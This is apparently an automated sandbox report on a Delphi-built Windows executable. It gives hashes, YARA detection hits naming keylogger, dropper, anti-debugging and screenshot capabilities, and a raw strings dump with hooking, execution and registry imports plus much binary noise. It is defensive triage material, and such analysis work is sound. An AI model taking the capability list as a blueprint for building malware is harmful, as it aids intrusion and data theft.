Sample details: c61e264e66bef6af55e101ef2d1a0dd9 --

Hashes
MD5: c61e264e66bef6af55e101ef2d1a0dd9
SHA1: d3298597e64f4297c81bdcc430b64a824a176722
SHA256: 1e3f36a95700dbffb0fb535e3052ef05410b61dcd035d8cbcf8026a6260c80e7
SSDEEP: 24576:TEtl9mRda1cSGB2uJ2s4otqFCJrW9FqvSbqsHasgXhFHDAGtlRXZ+CP63n0NuJvf:oEs1ht
Details
File Type: PE32
Yara Hits
YRP/Borland_Delphi_40_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Borland_Delphi_30_additional | YRP/Borland_Delphi_30_ | YRP/Borland_Delphi_Setup_Module | YRP/Borland_Delphi_40 | YRP/Borland_Delphi_v40_v50 | YRP/BobSoft_Mini_Delphi_BoB_BobSoft_additional | YRP/Borland_Delphi_v60_v70 | YRP/Borland_Delphi_v30 | YRP/Borland_Delphi_DLL | YRP/Borland | YRP/BobSoftMiniDelphiBoBBobSoft | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasOverlay | YRP/HasDigitalSignature | YRP/borland_delphi | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Browsers | YRP/Dropper_Strings | YRP/anti_dbg | YRP/network_dropper | YRP/screenshot | YRP/keylogger | YRP/spreading_file | YRP/win_mutex | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/Big_Numbers3 | YRP/Delphi_FormShow | YRP/Delphi_CompareCall | YRP/Delphi_Copy | YRP/Delphi_StrToInt | YRP/Delphi_DecodeDate | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/suspicious_packer_section | YRP/CAP_HookExKeylogger |
Strings
		Q>)txO
YYF;nt
,v:3|6
ectw,}j
!ckUpA
etugg6!
~oyY7E
wiaW$jj
h x's4
0WWAWW
YYImv'
< tK<	tG
PDTWWWWW
x	&TUr
L9Ejyi
d=Ejy4
.=G	eZ
T1Ejyi
*CIT[N
Y:::::
Y;:8::
^SSSSS
j"^SSSSS
v	N+D$
f1|AtI
H1ChYH
%'-Ht5,
PcY^AX6O
w+vpH6
9K9n6*
F?M?0z
9:5;?;
5$rP	"z
w:0;1v
c,Y88=
<3a5	|
S_Rq{KA_NqaNW_
Lt5_Ft-_
Ae'qL2	
N!sg5|H~n
 BTD&Z
t+WWVPV
R~`ypu
PQ"o9R
kFo-QU
TdmB*,
NWFQ&_
XUwp?n
skTp1vp'
uIOKab
:SEHhk
TTxX2@
]rT$vy
tU"Qn'4
:sZav8
'fyNkj
rijndael
n6mejw
3<r<Cp]~
N:Y'LEg
MzD.9D
@Fc`0l
Lr$igYwf
'g{8M/_Z"
Sy@0[&9Y
P5YY@1
'0"b]c
Mv4`fG
JMMj1)#
y>I)}o
2pwQ)Y
sK@@u,+
)>6Sx3
*v\4gxy
k$z0C]
RPYG4T_:
WYW8}K
{4bJCk
f<Sv+h
_UE	$?
PIqzdM
UY-A{R
mpX}?;<
_/Ijmg
minvQT
[Ztt'~Dm
w#&bKY
<)m^?T
[I-.n|~
L9U"'.
iB~rgV
.Kb2)qC
9r)duW
:(CiJo
I;iwR&
O5pNhd
ADVAPI32.DLL
`h`hhh
xppwpp
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UTF-16LE
UNICODE
Unknown Runtime Check Error
Stack memory around _alloca was corsurt
mcal`va
labl= w
s used before htEwasPin
tialized
y was corruptee
A cast to a slauher
data type has caure}$a 
oss of data.  If uhpw w
envional, you c
` mask the c
e of the cabtaw/t0 +h! (p1r#p=i&t: .i5m8s$.u 
or ex`m
g = (i
nddmi= Th:sHw
ffect the qtam9
y'oT zhd re
ptimized code.
volwe o
as not properly #fvzd
 FsGally a result oa c1|l?ns u 
n declared with oFe cQlli^g cnnrentio
$with a funstio~ pointer 
_^[YY]
S	_^[]
TPUtilWindow
TColor
EInvalidGraphicp
EInvalidGraphicOperation
TFontPitch
	fpDefault
fpVariable
fpFixed
Graphics
	TFontName
TFontCharset
TFontStyle
fsBold
fsItalic
fsUnderline
fsStrikeOut
Graphics
TFontStyles
	TPenStyle
psSolid
psDash
psDot	psDashDot
psDashDotDot
psClear
psInsideFrame
Graphics
TPenMode
pmBlack
pmWhite
pmCopy	pmNotCopy
pmMergePenNot
pmMaskPenNot
pmMergeNotPen
pmMaskNotPen
pmMerge
pmNotMerge
pmMask	pmNotMask
pmNotXor
Graphics
TBrushStyle
bsSolid
bsClear
bsHorizontal
bsVertical
bsFDiagonal
bsBDiagonal
bsCross
bsDiagCross
Graphics
TGraphicsObjectx
TGraphicsObjectP
Graphics
IChangeNotifier$
Graphics
TFontT
TFont$
Graphics
Charset
Color<
Height
Pitch<
Graphics
Style<
TBrush
TBrush
Graphics
TCanvas
TCanvasd
Graphics
Brush<
CopyModeP
TProgressStage
psStarting	psRunning
psEnding
Graphicst
TProgressEvent
Sender
TObject
TProgressStage
PercentDone
	RedrawNow
Boolean
String
TGraphic
TGraphic
Graphics
TPicture
TPicture
Graphics
TSharedImage
TMetafileImage
	TMetafile
	TMetafile
Graphics
TBitmapImage
TBitmap<
TBitmap
Graphics
TIconImage
Graphics
TResourceManager
_^[YY]
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
E$PVSj
_^[YY]
C ;C$s
TFileFormat
TFileFormatsList
QQQQSV
TClipboardFormats
_^[YY]
kD$TdP
kD$PdP
D$LPkD$XdPV
D$HPkD$TdPV
|$( EMFt
TBitmapCanvas
TBitmapCanvas
Graphics
_^[YY]
s(;~ t8
C(_^[Y]
TPatternManagerSV
_^[YY]
TObjectList
TOrderedList
TStack
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
GetMonitorInfo
DISPLAY
GetMonitorInfoA
DISPLAY
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
IHelpSelector$
:	HelpIntfs
IHelpSystem$
:	HelpIntfs
ICustomHelpViewer$
:	HelpIntfs	
IExtendedHelpViewer
:	HelpIntfs
ISpecialWinHelpViewer
:	HelpIntfs
IHelpManager$
:	HelpIntfs
EHelpSystemException
THelpViewerNode
THelpManager
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
TSynchroObject
TCriticalSection
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
TCommonDialog
TCommonDialog
Dialogs
HelpContext
OnClose
OnShowSV
TMessageForm
TMessageForm
Dialogs
_^[YY]
%s%s%s%s%s%s%s%s%s%s
Cancel
Ignore
NoToAll
YesToAll
Message
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
TImage
TImagex
ExtCtrls
Alignd>C
Anchors
AutoSize
Center
Constraints$7C
DragCursor
DragKind8=C
DragMode
Enabled
IncrementalDisplay
ParentShowHintP
Picture
	PopupMenu
Proportional
ShowHint
Stretch
Transparent
Visible
OnClick
OnContextPopup
OnDblClick
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnMouseDown@@C
OnMouseMove
	OnMouseUpp
OnProgress
OnStartDock
OnStartDrag
TTimer
TTimer
ExtCtrls
Enabled|
Interval
OnTimerU
Delphi Picture
Delphi Component
EIniFileException
TCustomIniFile
TIniFile
_^[YY]
ERegistryException
	TRegistryS
MAPI32.DLL
TConversion
TConversionFormat
comctl32.dll
TThemeServices
Theme manager 
 2001, 2002 Mike Lischke
 !"#$%
TTextLayout
tlCenter
tlBottom
StdCtrls
TCustomLabel
TCustomLabelx
StdCtrls
TLabel
TLabel
StdCtrls'
AligndKA
	Alignmentd>C
Anchors
AutoSize
BiDiMode
Caption
Constraints$7C
DragCursor
DragKind8=C
DragMode
Enabled
FocusControlP
ParentBiDiMode
ParentColor
ParentFont
ParentShowHint
	PopupMenu
ShowAccelChar
ShowHint
Transparent
Layout
Visible
WordWrap
OnClick
OnContextPopup
OnDblClick
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnMouseEnter
OnMouseLeave
OnStartDock
OnStartDragP
TCustomEdit
TCustomEditP
StdCtrls
TabStop
TScrollStyle
ssNone
ssHorizontal
ssVertical
ssBoth
StdCtrls
TCustomMemo
TCustomMemo\
StdCtrls
StdCtrls8
AligndKA
	Alignmentd>C
Anchors
BevelEdges
BevelInner
	BevelKind
BevelOuter
BiDiMode<
BorderStyle
Constraints
Ctl3D$7C
DragCursor
DragKind8=C
DragMode
EnabledP
HideSelection<LC
ImeMode
ImeNamePVA
Lines<
	MaxLength
OEMConvert
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
ParentShowHint
	PopupMenu
ReadOnly
ScrollBars
ShowHint
TabOrder
TabStop
Visible
WantReturns
WantTabs
WordWrap
OnChange
OnClick
OnContextPopup
OnDblClick
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnEnter
OnExit
	OnKeyDown
OnKeyPress
OnKeyUp
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnStartDock
OnStartDrag
TButtonActionLink
TButtonControl
TButtonControl
StdCtrls
TButton
TButton|
StdCtrls&
Actiond>C
Anchors
BiDiMode
Cancel
Caption
Constraints
Default$7C
DragCursor
DragKind8=C
DragMode
EnabledP
ModalResult
ParentBiDiMode
ParentFont
ParentShowHint
	PopupMenu
ShowHint
TabOrder
TabStop
Visible
WordWrap
OnClick
OnContextPopup
OnDragDrop,AC
OnDragOver\BC
	OnEndDock\BC
	OnEndDrag
OnEnter
OnExit
	OnKeyDown
OnKeyPress
OnKeyUp
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnStartDock
OnStartDragL
TMemoStrings
TMemoStringsL
StdCtrls
GH+D$	
_^[YY]
_^[YY]
BUTTON
THintAction0)C
THintAction
StdActns
TWinHelpViewer
_^[YY]
_^[YY]
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
_^[YY]
MS_WINHELP
#32770
TModalResult
TCursor
TAlign
alNone
alBottom
alLeft
alRight
alClient
alCustom
Controls
TDragObject
TDragObject
Controls
TBaseDragControlObject
TBaseDragControlObject
Controls
TDragControlObject
TDragControlObjectEx
TDragDockObject
TDragDockObjecth:C
Controls
TDragDockObjectEx
TControlCanvas
TControlCanvas
Controls
TControlActionLink
TMouseButton
mbLeft
mbRight
mbMiddle
Controls<=C
	TDragMode
dmManual
dmAutomatic
Controls
TDragState
dsDragEnter
dsDragLeave
dsDragMove
Controls
	TDragKind
dkDrag
dkDock
Controls
	TTabOrder
TCaption
TAnchorKind
akLeft
akRight
akBottom
Controls
TAnchors
TConstraintSize
TSizeConstraints
TSizeConstraints
Controls
	MaxHeightx>C
MaxWidthx>C
	MinHeightx>C
MinWidth
TMouseEvent
Sender
TObject
Button
TMouseButton
TShiftState
Integer
Integer
TMouseMoveEvent
Sender
TObject
TShiftState
Integer
Integer
	TKeyEvent
Sender
TObject
TShiftState
TKeyPressEvent
Sender
TObject
TDragOverEvent
Sender
TObject
Source
TObject
Integer
Integer
TDragState
Accept
Boolean
TDragDropEvent
Sender
TObject
Source
TObject
Integer
Integer
TStartDragEvent
Sender
TObject	
DragObject
TDragObject
TEndDragEvent
Sender
TObject
Target
TObject
Integer
Integer
TDockDropEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
TDockOverEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
TDragState
Accept
Boolean
TUnDockEvent
Sender
TObject
Client
TControl
	NewTarget
TWinControl
Boolean
TStartDockEvent
Sender
TObject	
DragObject
TDragDockObject
TGetSiteInfoEvent
Sender
TObject
DockClient
TControl
InfluenceRect
MousePos
TPoint
CanDock
Boolean
TCanResizeEvent
Sender
TObject
NewWidth
Integer
	NewHeight
Integer
Resize
Boolean
TConstrainedResizeEvent
Sender
TObject
MinWidth
Integer
	MinHeight
Integer
MaxWidth
Integer
	MaxHeight
Integer
TMouseWheelEvent
Sender
TObject
TShiftState
WheelDelta
Integer
MousePos
TPoint
Handled
Boolean
TMouseWheelUpDownEvent
Sender
TObject
TShiftState
MousePos
TPoint
Handled
Boolean
TContextPopupEvent
Sender
TObject
MousePos
TPoint
Handled
Boolean
TControl
TControl
Controls	
Width<
Height$7C
Cursor
HelpType
HelpKeyword
HelpContext
TWinControlActionLink
TImeMode
	imDisable
imClose
imOpen
imDontCare
imSAlpha
imAlpha
imHira
imSKata
imKata	imChinese
imSHanguel	imHanguel
Controls
TImeName
TBorderWidth
	TBevelCut
bvNone	bvLowered
bvRaised
bvSpace
Controls
TBevelEdge
beLeft
beRight
beBottom
Controls
TBevelEdges
TBevelKind
bkNone
bkTile
bkSoft
bkFlat
Controls
IDockManager$
Controls
TWinControl
TWinControl`NC
Controls
TGraphicControl
TGraphicControl<RC
Controls
TCustomControl
TCustomControl\SC
Controls
THintWindow
THintWindow
Controls
	TDockZone
	TDockTree
TMouse
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
	TSiteList
_^[YY]
S$_^[]
YZ]_^[
t%Jt?Jt[
%s (%s)
YZ]_^[
u$;~|u
tr;s@u
;CLtX3
_^[YY]
;s0t=;
IsControl
_^[YY]
_^[YY]
+WH+W@
:GauOFKu
DesignSize
_^[YY]
_^[YY]
k&9",:au
ztyjxjj
yp<m8v
tV(kvR
P*mc_}
SVc:s"
B[-M72
*UK7=v
ty{H	P
_^FP-\
7;|O'cZ
2?j0&Et
Vdc\$;
cD`)^c<
q+VJdl
CTdH+U
+)hw'}
hxI 3W
7Onmpo-2
w)HHK]t
mntA75
?kBU=r
wX3l^;
Ffh \3
v{+9vu'
m?E1$c
Q\3{ W
v C$2[(
h$tCDj
lkDU1	
u8c][f
PDuRts`
@-H7}$
tw<a1t
{K1ocx>
CrXyN0
~'tH8x>
B".%+(-OJ
aU2E{e	
QDPbM.
0}sPC^
}HXtnMe
/Dntke
0Onnte
fV,tqF43&Q,lP2@
|cIKjT
zB_^[+
Q{[Lk'$
o_^[RV
(#:"tG(
yHXN?U
^VA$cY
6!aK~0
>dcV|8
|6tRsp
O8Lv4y
TeK1isD
DxplBrer
! HeJpMe
sosoKt\W:83:
qZq8c,
q'kSp\[
RvzJx?
XY-mNS
~Nz{>ozk
<DdZYd
EUh*z<
]@7Dp|
|hNmuZFC
TScroloBarStyla
RegularcssFlat
sHotTra{
EForms
ontro0(#rollB=	
Contr3
t roS/
QardotComos=
Position<
4567?9G
.+*2h<
hHTracking
Visible
dSbb'w:
ormal#w1M
nimQz'd
sM-x+m
edYF-rms
`0olli
T+nVon
Hm,gQin
Wj6rglH*
rzS'w-l
rdezU6y
sNo>cJb
bsSizeabme
bsDialof
`sWoklRihd
ToolWin
Fnr}sK
PBarae~Swyce
ihimi}e
bhMaxkmizf
biLelp
TBorderIcons
TPosit
Design
efault
zeOnly
mCentor
ltMooit
mDes{to
	dmP`im
dMActigeF
rintXca
Propxrt
rintSoF
loseTct
caNohe
THElpEvent
Commind
Integev
|/lHelp
Boomean
Boolean
H?E`t?E
TBusthmFoqm
TCustolFor
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
ExitThread
CreateThread
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WritePrivateProfileStringA
WriteFile
WinExec
WaitForSingleObject
VirtualQuery
VirtualAlloc
UnmapViewOfFile
SizeofResource
SetThreadLocale
SetFilePointer
SetFileAttributesA
SetEvent
SetErrorMode
SetEndOfFile
ResumeThread
ResetEvent
ReadFile
MultiByteToWideChar
MulDiv
MoveFileA
MapViewOfFile
LockResource
LocalFree
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetTempPathA
GetSystemInfo
GetSystemDirectoryA
GetStringTypeExA
GetStdHandle
GetShortPathNameA
GetProcAddress
GetPrivateProfileStringA
GetModuleHandleA
GetModuleFileNameA
GetLogicalDriveStringsA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileAttributesA
GetExitCodeThread
GetDriveTypeA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedIncrement
InterlockedExchange
InterlockedDecrement
FreeLibrary
FormatMessageA
FindResourceA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteFileA
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CopyFileA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPointA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBitmapBits
ExcludeClipRect
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetClipboardData
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OpenClipboard
OffsetRect
OemToCharA
MsgWaitForMultipleObjects
MessageBoxA
MessageBeep
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDesktopWindow
GetDCEx
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
ExitWindowsEx
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
EmptyClipboard
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
CloseClipboard
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerBuffA
CharLowerA
CharUpperBuffA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
ole32.dll
OleUninitialize
OleInitialize
CoCreateInstance
CoUninitialize
CoInitialize
oleaut32.dll
GetErrorInfo
SysFreeString
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
shell32.dll
SHGetSpecialFolderLocation
SHGetPathFromIDListA
ADVAPI32.DLL
SetSecurityInfo
SetEntriesInAclA
GetSecurityInfo
333333333333333333
33333333?333333
333338
33333833
333838
3333339
3333333333333338
333333333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*"*"$3338
"*"$33
:33:"$
"C8338
"J"C3333
3333:"$
#33338
"J333333
33333:"$3333338
333333
$3333333
333333:"33333338
3333333
33333333
333333333333333333
33333333?333333
333338
33333833
333838
3333339
3333333333333338
333333333333333333
33DDDDD3333
33333333333
333333?
333333
333333
3333f3333333?
3336Dc3333338
333>fC333333
c333333
3333333333338
3333Dc3333333
3336fC3333338
333>fC333333
333>fd333333
fC33333
3333>fd333338
fC333?3
33fd3>fC333
fDFfC338
33>ffffc338
fff3333
3333333333338
4DF334DC33
333*C33
c33*C333
33338?383
F*F333383
"$c33333
"dc3333833
CjC338
CjC338
D*C33383
C33333833?33
3333333
3334JC33333338?333
C3333333
C3333333
3333fc33333338
333333333333?
33333?
333333
333333333333333333
333333333333333333
333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
3333:"$3333338
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
333DDD33333?
2C4"""D338
2$B""""C38
2""333:"C8
2""#33:DC8
333338
333333333333333
333333DDD3
:DC33:""$8
:"C333
$334B"$3
"DDB""$3
3:"""""
333333
333333333333333333
333333333333333333
333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
3333:"$3333338
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
33333333
HelpMe
'KillandHide
(ShlObj
System
SysInit
KWindows
UTypes
sActiveX
3Messages
CommCtrl
*ShellAPI
RegStr
?WinInet
UrlMon
FComObj
qComConst
CVariants
SysConst
$VarUtils
SysUtils
Dialogs
ExtCtrls
Consts
5Themes
nComCtrls
Printers
WWinSpool
^Classes
"RTLConsts
QTypInfo
+Graphics
FlatSB
StdActns
Clipbrd
YStrUtils
&Controls
MultiMon
vMenus
Contnrs
ImgList
EActnList
dStdCtrls
WinHelpViewer
RHelpIntfs
ComStrs
ExtActns
ExtDlgs
3CommDlg
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
AAccCtrl
AclAPI
TlHelp32
Un_Main
TPF0	TFrm_Main
Frm_Main
AlphaBlend	
AlphaBlendValue
BorderIcons
BorderStyle
bsNone
ClientHeight
ClientWidth
	clBtnFace
Font.Charset
DEFAULT_CHARSET
Font.Color
clWindowText
Font.Height
	Font.Name
MS Sans Serif
Font.Style
OldCreateOrder
Position
poScreenCenter
OnCreate
FormCreate
PixelsPerInch
TextHeight
Height
TabOrder
TTimer
Interval
OnTimer
	tmr1Timer
VirtualAlloc
VirtualFree
kernel32.dll
ExitProcess
user32.dll
MessageBoxA
wsprintfA
LOADER ERROR
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
 (08@P`p
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
user32.dll
advapi32.dll
oleaut32.dll
advapi32.dll
version.dll
gdi32.dll
user32.dll
oleaut32.dll
ole32.dll
oleaut32.dll
comctl32.dll
shell32.dll
advapi32.dll
GetKeyboardType
RegQueryValueExA
SysFreeString
RegSetValueExA
VerQueryValueA
UnrealizeObject
CreateWindowExA
SafeArrayPtrOfIndex
OleUninitialize
GetErrorInfo
ImageList_SetIconSize
SHGetSpecialFolderLocation
SetSecurityInfo
q|H"mxe
t~Hif D
#D|[aa
_^J2|;
i}|7|M
Tt\t.-
R#M|^uZ
f#k&+r
e]n^ip
+Gh33O
eEM	~_nNK
T`Is%Lp
833%b233G
)q$	,V
Hy733O5
U033O4
bkNf8Q
Dw433G
QwQUCg
%P433:
QwQU_g
:33O4T
49Qzki
QwQU_g
|$iO!H
@Ww@t,
 CD%e3
p&:aR2a^
@Io"G.
HHtXHBt
s^TS18
?If90t
BADDW<]V"
dV fY)
q"KN4T_,O
t_0fY)+
"K^]b6Kov`f
g@0I2.
">LE35
V B<S$>L5
bMADD5Z=3W</
5Z=saU_;A`f
y;VF$S
LE$P1Q
uTVWhC
QCj@j ^V
i_H1CSu
ST\P"EQ
Pou6Wx	u
< tK<	tG
^VhUNMP
A]8N\TP
C>UEQ2
VGALFP
HHtYHHq
vLIV'Z
Get>emue
w?rtMP
"$~U=P#Q
jmh4(k
